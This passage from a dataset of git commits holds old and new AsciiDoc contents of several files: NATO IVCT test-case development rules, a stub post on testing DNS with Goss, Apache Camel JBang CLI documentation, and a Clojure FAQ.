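A minimal sketch of that pattern, assuming an already-parsed JSON object with an API in the style of json-simple (the `federationName` parameter is hypothetical):\n\n[source,java]\n----\npublic class TC_CS_Verification_TcParam {\n\n \/\/ Step 1: declaration with a NULL value\n private String federationName = null;\n\n public TC_CS_Verification_TcParam(JSONObject config) {\n \/\/ Step 2: assignment from the value read by the JSON parser\n federationName = (String) config.get(\"federationName\");\n\n \/\/ Step 3: systematic check to detect invalid values\n if (federationName == null || federationName.isEmpty()) {\n throw new IllegalArgumentException(\"Invalid or missing federationName parameter\");\n }\n }\n}\n----\n\n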
==== Test Case Variables\nIt is mandatory to manage Test Case Variables in the model source code (file `TC_[ETC name]_BaseModel.java`).\n\n==== Logging\n\nIt is mandatory to use the logger implementation (logback) delivered by the framework.\nLogback configuration file: `[ETC name]\/src\/main\/resources\/logback.xml`.\nThere are 2 appenders: FILE and STDOUT.\nThere is currently a technical limitation that does not allow placing the output of a test case into a test case specific file. So, in order to facilitate the reading of the log file:\n\n* At the beginning of each test case, the following specific message is logged: `Start of tc_[ETC name].TC_XXXX_[meaningful name]`\nExample: `Start of tc_hla_declaration_management.TC_0001_Object_Publication`\n\n* At the end of each test case, the following specific message is logged:\n`End of tc_[ETC name].TC_XXXX_[meaningful name]`\nEx.: `End of tc_hla_declaration_management.TC_0001_Object_Publication`\n\n
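A sketch of how these markers might be emitted, assuming an slf4j logger backed by the framework's logback configuration (the class and package names reuse the hypothetical examples above):\n\n[source,java]\n----\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\npublic class TC_0001_Object_Publication {\n\n private static final Logger logger = LoggerFactory.getLogger(TC_0001_Object_Publication.class);\n\n public void execute() {\n \/\/ marker logged before any test logic runs\n logger.info(\"Start of tc_hla_declaration_management.TC_0001_Object_Publication\");\n\n \/\/ ... test case logic ...\n\n \/\/ marker logged after the test logic has completed\n logger.info(\"End of tc_hla_declaration_management.TC_0001_Object_Publication\");\n }\n}\n----\n\n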
==== GUI\nNo GUI in the ETC, only parameters.\n\n==== Results\nThe result of an ETC must be one of the following:\n\n* INCONCLUSIVE: Corresponds to an error during initialisation (preambleAction method) or termination (postambleAction method) of the test.\n* FAILED: An error \/ a problem occurred during the execution of the ETC that leads to a failure\n* PASSED: No error \/ problem occurred during the execution of the ETC, the test is passed\n","old_contents":"== Executable Test Case Development Rules\n\nThese rules were discussed between nations on 18 October 2016.\n\n=== RTI compatibility\nThe ETC must be developed and tested with both Pitch and M\u00c4K RTI, last versions if possible.\nSome specific libraries (RTI adapters) will be developed in integrated in IVCT. ETC development must be done upon those RTI adapters.\n\n=== Overall ETC structure\n\n==== GitHub project name \/ Java package project name \/ Class names\nGitHub Repository name: TC_[ETC name]\nEx.: `TC_CS_Verification`\n\nExample:\n----\nTC_CS_Verification\n----\n\nJava main package name: nato.ivct.etc.tc_[ETC name].\nExample:\n----\nnato.ivct.etc.tc_cs_verification\nnato.ivct.etc.fr.tc_hla_declaration_management\n----\n\nMain class names: TC_XXXX_[meaningful name].java.\nN.B. : [meaningful name] is meaningful in the context of ETC, and is different of [ETC name] to avoid redundancy.\nExample:\n----\nTC_0001_Object_Publication.java\nTC_0002_Interaction_Subscription.java\n----\n\nJava model and parameters package name: nato.ivct.etc.tc_**lib_**[ETC name].\nExample:\n----\nnato.ivct.etc.tc_lib_cs_verification\nnato.ivct.etc.fr.tc_lib_hla_declaration_management\n----\n\nETC model and parameters classes names: TC_[ETC name]__BaseModel.java and TC_[ETC name]_TcParam.java.\nExample:\n----\nTC_CS_Verification_BaseModel.java\nTC_CS_Verification_TcParam.java\n----\n\nNOTE: **Warning:** The full name of a class may be very long, e.g.: `nato.ivct.etc.tc_hla_declaration_management.TC_0001_Object_Publication`\n\n==== 3rd party libraries\nBecause one of the main problem with Java development is the management of dependencies (i.e. librairies), _**all new development (new ETC) must use already existing libraries**_. It will avoid some inconsistency and incompatibility between codes developed by different developers that may use different versions of the same library.\nAll 3rd party libraries must be declared in ETC Gradle files, as it is done in HelloWorld example.\n\n**Question:** Where do new 3rd party libraries must be dropped off? It seems that Gradle manages some cache.\n\n**Question:** How to have access to the libraries list that are already used by developed ETC? Who is responsible for the management of that list?\n\n=== Development best practices\n==== Test Case Parameters\nIt is mandatory to use JSON file to define parameter values.\n3 steps in the initialization of Test Case Parameters (file `TC_[ETC name]_TcParam.java`) :\n\n. Declaration with a NULL value\n. Assignation to the value read using JSON parser\n. 
Systematic check to detect invalid value\n\n==== Test Case Variables\nIt is mandatory to manage Test Case Variables in the model source code (file `TC_[ETC name]_BaseModel.java`).\n\n==== Logging\n\nIt is mandatory to use of the logger implementation (lockback) delivered by the framework.\nLockback configuration file: `[ETC name]\/src\/main\/resources\/logback.xml`.\nThere is 2 appenders: FILE and STDOUT.\nThere is currently a technical limitation that does not allow to place the output of a test case into a test case specific file. So, in order to facilitate the reading of the log file :\n\n* At the beginning of each text case, the following specific message is logged: `Start of tc_[ETC name].TC_XXXX_[meaningful name]`\nExample: `Start of tc_hla_declaration_management.TC_0001_Object_Publication`\n\n* At the beginning of each text case, the following specific message is logged:\n`End of tc_[ETC name].TC_XXXX_[meaningful name]`\nEx.: `End of tc_hla_declaration_management.TC_0001_Object_Publication`\n\n==== GUI\nNo GUI in the ETC, only parameters.\n\n==== Results\nThe result of an ETC must be the following:\n\n* INCONCLUSIVE: Corresponds to an error during initialisation (preambleAction method) or termination (postambleAction method) of the test.\n* FAILED: An error \/ a problem occurred during the execution of the ETC that leads to a failure\n* PASSED: No error \/ problem occurred during the execution of the ETC, the test is passed\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1f218828944f7385962f476b8fe343828e73ac41","subject":"Update 2017-02-20-Testing-DNS-Infrastructure-with-Goss.adoc","message":"Update 2017-02-20-Testing-DNS-Infrastructure-with-Goss.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2017-02-20-Testing-DNS-Infrastructure-with-Goss.adoc","new_file":"_posts\/2017-02-20-Testing-DNS-Infrastructure-with-Goss.adoc","new_contents":"= Testing DNS Infrastructure with Goss\n:hp-tags: Goss, DNS, Testing, DevOps, Linux, Monitoring\n:hp-image: images\/covers\/OFFLINE.jpg\n","old_contents":"= Testing DNS Infrastructure with Goss\n:hp-tags: Goss, DNS, Testing, DevOps, Linux, Monitoring\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"07fd3e7f2261460ebc25401d907e990656b1180b","subject":"CAMEL-17199: update documentation to align Camel JBang CLI usage w\/ Karavan (#6442)","message":"CAMEL-17199: update documentation to align Camel JBang CLI usage w\/ Karavan (#6442)\n\n","repos":"apache\/camel,tadayosi\/camel,apache\/camel,pax95\/camel,cunningt\/camel,adessaigne\/camel,adessaigne\/camel,christophd\/camel,christophd\/camel,pax95\/camel,apache\/camel,cunningt\/camel,adessaigne\/camel,christophd\/camel,christophd\/camel,cunningt\/camel,tadayosi\/camel,apache\/camel,tadayosi\/camel,apache\/camel,adessaigne\/camel,cunningt\/camel,christophd\/camel,christophd\/camel,tadayosi\/camel,pax95\/camel,pax95\/camel,cunningt\/camel,pax95\/camel,tadayosi\/camel,apache\/camel,adessaigne\/camel,tadayosi\/camel,cunningt\/camel,adessaigne\/camel,pax95\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-jbang.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-jbang.adoc","new_contents":"= Camel JBang\n\nA JBang-based Camel app for searching for kamelets, components, languages, running routes.\n\nThe `camel-jbang` is available from *Camel 3.12* and newer versions.\n\nWhen running Camel JBang, it is possible to set 
the Camel version to use. For instance, to run the commands with version 3.13.0, define the `camel.jbang.version` property in the command line.\n\n== Using Camel JBang\n\nThe CamelJBang supports multiple commands. Running the command below will print all of them:\n\n[source,bash]\n----\njbang -Dcamel.jbang.version=3.13.0 CamelJBang@apache\/camel [command]\n----\n\n*Note*: the first time you run this command, it may cause dependencies to be cached, therefore taking a few extra seconds to run.\n\nAll the commands support the `--help` flag and will display the appropriate help when it is provided.\n\n=== Search\n\nYou can use the CLI to search for kamelets, components, languages and miscellaneous components (others). Running the following command will present a list of items that can be searched:\n\n[source,bash]\n----\njbang -Dcamel.jbang.version=3.13.0 CamelJBang@apache\/camel search --help\n----\n\nFor example, to search for kamelets named `jms`, you can use:\n\n[source,bash]\n----\njbang -Dcamel.jbang.version=3.13.0 CamelJBang@apache\/camel search kamelets --search-term=jms\n----\n\nTo list all the kamelets, just run the command without any search term:\n\n[source,bash]\n----\njbang -Dcamel.jbang.version=3.13.0 CamelJBang@apache\/camel search kamelets\n----\n\n\nThe same behavior also works for all the other search commands. The table below lists all search commands available at the moment:\n\n|===\n|Command |Description\n\n|kamelets\n|search for kamelets\n\n|components\n|search for components\n\n|languages\n|search for languages\n\n|others\n|search for miscellaneous components\n\n|===\n\n\n=== Init Kamelets\n\nThe init sub-command can be used to simplify creating Kamelets. Through this command, it is possible to create new Kamelets from pre-configured templates. It works in two steps: first it is necessary to bootstrap the Kamelet by creating a properties file with the parameters necessary to create the Kamelet. Once the properties file is correctly set, it is possible to create a pre-filled Kamelet by processing that properties file.\n\nTo bootstrap the Kamelet run:\n\n[source,bash]\n----\njbang -Dcamel.jbang.version=3.13.0 CamelJBang@apache\/camel init kamelet --bootstrap\n----\n\nThis will create a sub-directory called `work` in the current directory with a properties file named `init-template.properties` inside it.\n\nThe keys of the properties file are commented with the details about what needs to be filled in order to generate the Kamelet. If a value is missing, it will be ignored when generating the Kamelet and will need to be filled in manually later.\n\nAfter you have filled the values, you can generate the Kamelet using:\n\n[source,bash]\n----\njbang -Dcamel.jbang.version=3.13.0 CamelJBang@apache\/camel init kamelet --properties-path work\/init-template.properties\n----\n\nRunning this command will create a new file in the `work` directory. The name of the generated file is determined by the `kameletMetadataName` property in the properties file. As such, parsing the default properties file would generate a file named `my-sample-sink.kamelet.yaml` in the directory.\n\n
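The exact contents depend on the values supplied in the properties file, but the result follows the usual Kamelet layout. An illustrative, hand-written skeleton (not actual tool output) might look like this:\n\n[source,yaml]\n----\napiVersion: camel.apache.org\/v1alpha1\nkind: Kamelet\nmetadata:\n name: my-sample-sink\n labels:\n camel.apache.org\/kamelet.type: \"sink\"\nspec:\n definition:\n title: \"My Sample Sink\"\n description: \"A sample sink Kamelet\"\n properties: {}\n template:\n from:\n uri: \"kamelet:source\"\n steps:\n - log: \"${body}\"\n----\n\n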
After the file is generated, it may still require final adjustments, such as correctly setting the name, the icon and other requirements for official Kamelets. Please consult the Kamelet development documentation for updated details.\n\n\n=== Init Bindings\n\nThe init sub-command can also be used to simplify creating Kamelet bindings. With this command, it is possible to create new bindings from pre-configured templates. Use the `--kamelet` option (you can list the available ones using the search command) to set the Kamelet to generate the binding for.\n\nTo execute this feature, run:\n\n[source,bash]\n----\njbang -Dcamel.jbang.version=3.13.0 CamelJBang@apache\/camel init binding --destination \/path\/to\/destination\/directory\/ --kamelet sftp-source\n----\n\nThis will create a new sample YAML binding file that can be modified and used in Camel K.\n\n
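For reference, such a binding typically has the `KameletBinding` shape sketched below. This is a hand-written illustration rather than the exact generated output, and the binding name and sink URI are made up:\n\n[source,yaml]\n----\napiVersion: camel.apache.org\/v1alpha1\nkind: KameletBinding\nmetadata:\n name: sftp-source-binding\nspec:\n source:\n ref:\n kind: Kamelet\n apiVersion: camel.apache.org\/v1alpha1\n name: sftp-source\n sink:\n uri: \"log:info\"\n----\n\n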
Running the following command will present a list of items that can be searched:\n\n[source,bash]\n----\nCamelJBang.java search --help\n----\n\nFor example, to search for kamelets named `jms`, you can use:\n\n[source,bash]\n----\nCamelJBang.java search kamelets --search-term=jms\n----\n\nTo list all the kamelets, just run the command without any search term:\n\n[source,bash]\n----\nCamelJBang.java search kamelets\n----\n\n\nThe same behavior also works for all the other search commands. The table below lists all search commands available at the moment:\n\n|===\n|Command |Description\n\n|kamelets\n|search for kamelets\n\n|components\n|search for components\n\n|languages\n|search for languages\n\n|others\n|search for miscellaneous components\n\n|===\n\n\n=== Init Kamelets\n\nThe init sub-command can be used to simplify creating Kamelets. Through this command, it is possible to create new Kamelets through pre-configured templates. It works in two steps: first it is necessary to bootstrap the Kamelet by creating a properties file with the parameters necessary to create the Kamelet. Once the properties file is correctly set, then it is possible to create a pre-filled Kamelet by processing that properties file.\n\nTo bootstrap the Kamelet run:\n\n[source,bash]\n----\nCamelJBang init kamelet --bootstrap\n----\n\nThis will create a sub-directory called `work` in the current directory with a properties file named `init-template.properties` inside it.\n\nThe keys of the properties file are commented with the details about what need to be filled in order to generate the Kamelet. If a value is missing, it will be ignored when generating the Kamelet and will need to be filled in manually later.\n\nAfter you have filled the values, you can generate the Kamelet using:\n\n[source,bash]\n----\nCamelJBang init kamelet --properties-path work\/init-template.properties\n----\n\nRunning this command will create a new file in the `work` directory. The name of the generated file is determined by the `kameletMetadataName` property in the properties file. As such, parsing the default properties file would generate a file named `my-sample-sink.kamelet.yaml` in the directory.\n\nAfter the file is generated, it may still need to require final adjustments, such as correctly setting the name, the icon and other requirements for official Kamelets. Please consult the Kamelet development documentation for updated details.\n\n\n=== Init Bindings\n\nThe init sub-command can also be used to simplify creating Kamelets bindings. Through this command, it is possible to create new bindings through pre-configured templates. Use the `--kamelet` option (you can list the available ones using the search command) to set the Kamelet to generate the binding for.\n\nTo execute this feature run:\n\n[source,bash]\n----\nCamelJBang init binding --destination \/path\/to\/destination\/directory\/ --kamelet sftp-source\n----\n\nThis will create a new sample YAML binding file that can be modified and used in Camel K.\n\nYou can also generate bindings that can be run by CamelJBang or Camel Core, but setting the `--project` option:\n\n[source,bash]\n----\nCamelJBang init binding --destination \/path\/to\/destination\/directory\/ --kamelet sftp-source --project core\n----\n\n\n== Running Routes\n\nAt the moment it is possible to run YAML-based routes which also refer to Kamelets in the catalog.\n\nIn order to do so, write a YAML-based file with the `route`, the `steps` and the `to` destination for the route. 
The following example, shows a route that uses the Timer Source Kamelet to produce messages every second. The body of the messages will be logged to the standard output. Subsequently, they will be sent to a AMQP 1.0 compliant broker using the JMS AMQ 1.0 Sink Kamelet.\n\n[source,yaml]\n----\n- route:\n from:\n uri: \"kamelet:timer-source\"\n parameters:\n period: 1000\n message: \"Hello Camel JBang\"\n steps:\n - log: \"${body}\"\n - to:\n uri: \"kamelet:jms-amqp-10-sink\"\n parameters:\n remoteURI: amqp:\/\/localhost:61616\n destinationName: test-queue\n----\n\nExecute the following command to run this route:\n\n[source,bash]\n----\nCamelJBang run jms-amqp-10-sink-binding.yaml\n----\n\nNOTE: it is necessary to have a AMQP 1.0 broker, such as Apache Artemis, running locally and listening on port 61616. Adjust the route accordingly if using a different address for the broker.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9d7703854a318427ae951dbde7c56aae9c9b506","subject":"faq tweak","message":"faq tweak\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/faq.adoc","new_file":"content\/guides\/faq.adoc","new_contents":"= Frequently Asked Questions\nAlex Miller\n2015-01-01\n:type: guides\n:toc: macro\n:icons: font\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\ntoc::[]\n\nThese questions and answers are adapted from mailing lists and other Clojure community forums.\n\n== Reader and Syntax\n\n[[why_keywords]]\n**What's the advantage of representing text tokens as keywords (instead of as strings)?**\n\nKeywords are cached and interned. This means that a keyword is reused (reducing memory) everywhere in your program and that checks for equality really become checks for identity (which are fast). Additionally, keywords are invokable to look themselves up in a map, and thus this makes the common pattern of extracting a particular field from a collection of maps possible.\n\n[[reader_macros]]\n**Why does Clojure not have user-extensible reader macros?**\n\nThe reader takes text (Clojure source) and returns Clojure data, which is subsequently compiled and evaluated. Reader macros tell the Clojure reader how to read something that is not a typical s-expression (examples are things like quoting `'` and anonymous functions `#()`). Reader macros can be used to define entirely new syntaxes read by the reader (for example: JSON, XML, or other formats) - this is a more powerful syntactic capability than regular macros (which come into play later at compile time). \n\nHowever, unlike Lisp, Clojure does not allow the user to extend this set of reader macros. This avoids the possibility of creating code that another user cannot read (because they do not have the proper reader macros). Clojure gives back some of the power of reader macros with tagged literals, allowing you to create generically readable _data_ that is still extensible.\n\n[[underscore]]\n**What does an _ mean in a let binding or parameter?**\n\n_ has no special meaning in Clojure as a symbol. 
However, it is a convention to use _ (or a leading _) to denote a binding that will not be used in the expression.\n\n[source,clojure]\n----\n(defn get-x [point]\n (let [[x _] point] ;; y-value of point is unused, so mark it with _\n x))\n----\n\n== Collections, Sequences, and Transducers\n\n[[conj]]\n**Why does `conj` add to the front of a list and the back of a vector?**\n\nMost Clojure data structure operations, including `conj` (conjoin), are designed to give the user a performance expectation. With `conj`, the expectation is that insertion should happen at the place where this operation is efficient. Lists (as linked lists) can make a constant time insertion only at the front. Vectors (indexed) are designed to expand at the back. As the user, you should consider this when you choose which data structure to use. In Clojure, vectors are used with much greater frequency.\n\n[[seqs_vs_colls]]\n**I keep forgetting that after calling sequence functions on vectors\/sets, the return value no longer has vector or set semantics.**\n\nGenerally you should divide the Clojure core functions into these two categories:\n\n- Data structure functions - take a data structure and return a modified version of that data structure (conj, disj, assoc, dissoc, etc). These functions always take the data structure _first_.\n- Sequence functions - take a \"seqable\" and return a seqable. [Generally we try to avoid committing to the return values actually being an instance of ISeq - this allows for performance optimizations in some cases.] Examples are map, filter, remove, etc. All of these functions take the seqable _last_.\n\nIt sounds like you are using the latter but expecting the semantics of the former (which is a common issue for new Clojurists!). If you want to apply sequence functions but have more control over the output data structure, there are a number of ways to do that.\n\n. Use data-structure equivalents like mapv or filterv, etc - this is a very limited set that lets you perform these ops but return a data structure rather than a seqable. `(mapv inc (filterv odd? [1 2 3]))`\n. Pour the results of your sequence transformations back into a data structure with into: `(into [] (map inc (filter odd? [1 2 3])))`\n. Use transducers (likely with `into`) - this has much the same effect as #2, but combinations of transformations can be applied more efficiently without creating any sequences - only the final result is built: `(into [] (comp (filter odd?) (map inc)) [1 2 3])`. As you work with larger sequences or more transformations, this makes a significant difference in performance.\n\nNote that all of these are eager transformations - they produce the output vector when you invoke them. The original sequence version `(map inc (filter odd? [1 2 3]))` is lazy and will only produce values as needed (with chunking under the hood for greater performance). Neither of these is right or wrong, but they are both useful in different circumstances.\n\n[[transducers_vs_seqs]]\n**What are good use cases for transducers?**\n\nWhen performing a series of transformations, sequences will create an intermediate (cached) sequence between each transformation. Transducers create a single compound transformation that is executed in one eager pass over the input. 
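For instance, the two expressions below compute the same result - the first builds an intermediate lazy sequence between steps, while the second runs one composed, eager pass (a minimal sketch using only clojure.core):\n\n[source,clojure]\n----\n;; sequence version: filter and map each produce an intermediate sequence\n(reduce + (map inc (filter odd? (range 1000))))\n\n;; transducer version: one compound transformation, a single eager pass\n(transduce (comp (filter odd?) (map inc)) + (range 1000))\n----\n\n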
These are different models, which are both useful.\n\nPerformance benefits of transducers:\n\n- Source collection iteration - when used on reducible inputs (collections and other things), transducers avoid creating an unnecessary input collection sequence - helps memory and time.\n- Intermediate sequences and cached values - as the transformation happens in a single pass, you remove all intermediate sequence and cached value creation - again, helps memory and time. The combination of the prior item and this one will start to win big as the size of the input collection or number of transformations goes up (but for small numbers of either, chunked sequences can be surprisingly fast and will compete).\n\nDesign \/ usage benefits of transducers:\n\n- Transformation composition - some use cases will have a cleaner design if they separate transformation composition from transformation application. Transducers support this.\n- Eagerness - transducers are great for cases where eagerly processing a transformation (and potentially encountering any errors) is more important than laziness.\n- Resource control - because you have more control over when the input collection is traversed, you also know when processing is complete. It's thus easier to release or clean up input resources because you know when that happens.\n\nPerformance benefits of sequences:\n\n- Laziness - if you will only need some of the outputs (for example a user is deciding how many to use), then lazy sequences can often be more efficient in deferring processing. In particular, sequences can be lazy with intermediate results, but transducers use a pull model that will eagerly produce all intermediate values.\n- Infinite streams - because transducers are typically eagerly consumed, they don't match well with infinite streams of values.\n\nDesign benefits of sequences:\n\n- Consumer control - returning a seq from an API lets you combine input + transformation into something that gives the consumer control. Transducers don't work as well for this (but will work better for cases where input and transformation are separated).\n\n\n== State and Concurrency\n\n[[concurrency_features]]\n**What are the trade-offs between reducers, core.async, and futures?**\n\nEach of these really addresses a different use case.\n\n- Reducers are best for fine-grained data parallelism when computing a transformation over existing in-memory data (in a map or vector). Generally it's best when you have thousands of small data items to compute over and many cores to do the work. Anything described as \"embarrassingly parallel\".\n- futures are best for pushing work onto a background thread and picking it up later (or for doing I\/O waits in parallel). It's better for big chunky tasks (go fetch a bunch of data in the background).\n- core.async is primarily used to organize the subsystems or internal structure of your application. It has channels (queues) to convey values from one \"subprocess\" (go block) to another. So you're really getting concurrency and architectural benefits in how you break up your program. The killer feature you can really only get in core.async is the ability to wait on I\/O events from multiple channels for the first response on any of them (via alt\/alts). Promises can also be used to convey single values between independent threads\/subprocesses but they are single delivery only.\n- you didn't mention pmap, but tools like pmap, java.util queues and executors, and libraries like claypoole are doing coarse-level \"task\" concurrency. 
There is some overlap with core.async here which has a very useful transducer-friendly pipeline functionality.\n\n[[write_skew]]\n**Why does the Clojure STM not guarantee serializability, but only snapshot isolation?**\n\nIf reads were included by default, then STM would be slower (as more transactions would require serializability). However, in many cases, reads do not need to be included. Thus, users can choose to accept the performance penalty when it is necessary and get faster performance when it is not.\n\n== Namespaces\n\n[[ns_file]]\n**Do namespaces map 1-to-1 with files?**\n\nNo (although that is typical). One namespace can be split across multiple files by using `load` to load secondary files and `in-ns` in those files to retain the namespace (clojure.core is defined in this way). Also, it is possible to declare multiple namespaces in a single file (although this is very unusual).\n\n[[ns_as_fn]]\n**Do namespaces work like regular functions? Looking at the syntax, it seems ns could be returning a function that makes a namespace, and then if you just stick parens around the contents of the file, that would be a regular S expression too. Does that imply you can put more than one in a file?**\n\nns is a macro that does a number of things:\n\n- creates a new internal Namespace object (if it does not yet exist)\n- makes that namespace the new current namespace (*ns*)\n- auto-refers all vars from clojure.core and imports all classes from java.lang\n- requires\/refers other namespaces and vars as specified\n- (and other optional things)\n\nns does not return a function or anything invokable as you suggest.\n\nWhile ns is typically placed at the top of a clj file, it is actually just a normal macro and can be invoked at the repl just the same. It could also be used more than once in a single file (although this would be surprising to most clj programmers and would likely not work as desired in AOT).\n\n== Compiler\n\n[[direct_linking_repl]]\n**How does direct linking affect the REPL experience?**\n\nAnything that has been direct linked will not see redefinitions to vars. For example, if you redefine something in clojure.core, other parts of core that use that var will not see the redefinition (however anything that you newly compile at the REPL will). In practice, this is not typically a problem.\n\nFor parts of your own app, you may wish to only enable direct linking when you build and deploy for production, rather than using it when you are developing at the REPL. Or you may need to mark parts of your app with ^:redef if you want to always allow redefinition or ^:dynamic for dynamic vars.\n\n== Design and Use\n\n[[encapsulation]]\n**How do you achieve encapsulation with Clojure?**\n\nBecause of its focus on immutable data, there is generally not a high value placed on data encapsulation. Because data is immutable, there is no worry about someone else modifying a value. Likewise, because Clojure data is designed to be manipulated directly, there is significant value in providing direct access to data, rather than wrapping it in APIs.\n\nAll Clojure vars are globally available so again there is not much in the way of encapsulation of functions within namespaces. 
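As a small illustration of the private var convention described below, a namespace might expose one public function built on a private helper (a sketch, not a prescription - the names here are invented for the example):\n\n[source,clojure]\n----\n(ns my.app\n (:require [clojure.string :as string]))\n\n(defn- normalize ;; private: intended for use only inside my.app\n [s]\n (string\/lower-case s))\n\n(defn greet ;; the public part of the API\n [person]\n (str \"hello, \" (normalize person)))\n----\n\n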
However, the ability to mark vars private (either using `defn-` for functions or `def` with `^:private` for values) is a convenience for a developer to indicate which parts of an API should be considered public for use vs part of the implementation.\n\n","old_contents":"= Frequently Asked Questions\nAlex Miller\n2015-01-01\n:type: guides\n:toc: macro\n:icons: font\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\ntoc::[]\n\nThese questions and answers are adapted from mailing lists and other Clojure community forums.\n\n== Reader and Syntax\n\n[[why_keywords]]\n**What's the advantage of representing text tokens as keywords (instead of as strings)?**\n\nKeywords are cached and interned. This means that a keyword is reused (reducing memory) everywhere in your program and that checks for equality really become checks for identity (which are fast).\n\n[[reader_macros]]\n**Why does Clojure not have user-extensible reader macros?**\n\nThe reader takes text (Clojure source) and returns Clojure data, which is subsequently compiled and evaluated. Reader macros tell the Clojure reader how to read something that is not a typical s-expression (examples are things like quoting `'` and anonymous functions `#()`). Reader macros can be used to define entirely new syntaxes read by the reader (for example: JSON, XML, or other formats) - this is a more powerful syntactic capability than regular macros (which come into play later at compile time). \n\nHowever, unlike Lisp, Clojure does not allow the user to extend this set of reader macros. This avoids the possibility of creating code that another user cannot read (because they do not have the proper reader macros). Clojure gives back some of the power of reader macros with tagged literals, allowing you to create generically readable _data_, that is still extensible.\n\n[[underscore]]\n**What does an _ mean in a let binding or parameter?**\n\n_ has no special meaning in Clojure as a symbol. However, it is a convention to use _ (or a leading _) to denote a binding that will not be used in the expression.\n\n[source,clojure]\n----\n(defn get-x [point]\n (let [[x _] point] ;; y-value of point is unused, so mark it with _\n x))\n----\n\n== Collections, Sequences, and Transducers\n\n[[conj]]\n**Why does `conj` add to the front of a list and the back of a vector?**\n\nMost Clojure data structure operations, including `conj` (conjoin), are designed to give the user a performance expectation. With `conj`, the expectation is that insertion should happen at the place where this operation is efficient. Lists (as linked lists) can make a constant time insertion only at the front. Vectors (indexed) are designed to expand at the back. As the user, you should consider this when you choose which data structure to use. In Clojure, vectors are used with much greater frequency.\n\n[[seqs_vs_colls]]\n**I keep forgetting that after calling sequence functions on vectors\/sets, the return value no longer is no longer has vector or set semantics.**\n\nGenerally you should divide the Clojure core functions into these two categories:\n\n- Data structure functions - take a data structure and return a modified versions of that data structure (conj, disj, assoc, dissoc, etc). These functions always take the data structure _first_.\n- Sequence functions - take a \"seqable\" and return a seqable. [Generally we try to avoid committing to the return values actually being an instance of ISeq - this allows for performance optimizations in some cases.] 
Examples are map, filter, remove, etc. All of these functions take the seqable _last_.\n\nIt sounds like you are using the latter but expecting the semantics of the former (which is a common issue for new Clojurists!). If you want to apply sequence functions but have more control over the output data structure, there are a number of ways to do that.\n\n. Use data-structure equivalents like mapv or filterv, etc - this is a very limited set that lets you perform these ops but return a data structure rather than a seqable. `(mapv inc (filterv odd? [1 2 3]))`\n. Pour the results of your sequence transformations back into a data structure with into: `(into [] (map inc (filter odd? [1 2 3])))`\n. Use transducers (likely with `into`) - this has much the same effect as #2, but combinations of transformations can be applied more efficiently without creating any sequences - only the final result is built: `(into [] (comp (filter odd?) (map inc)) [1 2 3])`. As you work with larger sequences or more transformations, this makes a significant difference in performance.\n\nNote that all of these are eager transformations - they produce the output vector when you invoke them. The original sequence version `(map inc (filter odd? [1 2 3]))` is lazy and will only produce values as needed (with chunking under the hood for greater performance). Neither of these is right or wrong, but they are both useful in different circumstances.\n\n[[transducers_vs_seqs]]\n**What are good use cases for transducers?**\n\nWhen performing a series of transformations, sequences will create an intermediate (cached) sequence between each transformation. Transducers create a single compound transformation that is executed in one eager pass over the input. These are different models, which are both useful.\n\nPerformance benefits of transducers:\n\n- Source collection iteration - when used on reducible inputs (collections and other things), avoid creating an unnecessary input collection sequence - helps memory and time.\n- Intermediate sequences and cached values - as the transformation happens in a single pass, you remove all intermediate sequence and cached value creation - again, helps memory and time. The combination of the the prior item and this one will start to win big as the size of the input collection or number of transformations goes up (but for small numbers of either, chunked sequences can be surprisingly fast and will compete).\n\nDesign \/ usage benefits of transducers:\n\n- Transformation composition - some use cases will have a cleaner design if they separate transformation composition from transformation application. Transducers support this.\n- Eagerness - transducers are great for cases where eagerly processing a transformation (and potentially encountering any errors) is more important than laziness\n- Resource control - because you have more control over when the input collection is traversed, you also know when processing is complete. It's thus easier to release or clean up input resources because you know when that happens.\n\nPerformance benefits of sequences:\n\n- Laziness - if you will only need some of the outputs (for example a user is deciding how many to use), then lazy sequences can often be more efficient in deferring processing. 
In particular, sequences can be lazy with intermediate results, but transducers use a pull model that will eagerly produce all intermediate values.\n- Infinite streams - because transducers are typically eagerly consumed, they don't match well with infinite streams of values\n\nDesign benefits of sequences:\n\n- Consumer control - returning a seq from an API lets you combine input + transformation into something that gives the consumer control. Transducers don't work as well for this (but will work better for cases where input and transformation are separated).\n\n\n== State and Concurrency\n\n[[concurrency_features]]\n**What are the trade-offs between reducers, core.async, and futures?**\n\nEach of these really addresses a different use case.\n\n- Reducers are best for fine-grained data parallelism when computing a transformation over existing in-memory data (in a map or vector). Generally it's best when you have thousands of small data items to compute over and many cores to do the work. Anything described as \"embarrassingly parallel\".\n- futures are best for pushing work onto a background thread and picking it up later (or for doing I\/O waits in parallel). It's better for big chunky tasks (go fetch a bunch of data in the background).\n- core.async is primarily used to organize the subsystems or internal structure of your application. It has channels (queues) to convey values from one \"subprocess\" (go block) to another. So you're really getting concurrency and architectural benefits in how you break up your program. The killer feature you can really only get in core.async is the ability to wait on I\/O events from multiple channels for the first response on any of them (via alt\/alts). Promises can also be used to convey single values between independent threads\/subprocesses but they are single delivery only.\n- you didn't mention pmap, but tools like pmap, java.util queues and executors, and libraries like claypoole are doing coarse-level \"task\" concurrency. There is some overlap with core.async here which has a very useful transducer-friendly pipeline functionality.\n\n[[write_skew]]\n**Why does the Clojure STM does not guarantee serializability but only snapshot isolation?**\n\nIf reads were included by default, then STM would be slower (as more transactions would require serializability). However, in many cases, reads do not need to be included. Thus, users can choose to accept the performance penalty when it is necessary and get faster performance when it is not.\n\n== Namespaces\n\n[[ns_file]]\n**Do namespaces map 1-to-1 with files?**\n\nNo (although that is typical). One namespace can be split across multiple files by using `load` to load secondary files and `in-ns` in those files to retain the namespace (clojure.core is defined in this way). Also, it is possible to declare multiple namespaces in a single file (although this is very unusual).\n\n[[ns_as_fn]]\n**Do namespaces work like regular functions? Looking at the syntax, it seems ns could 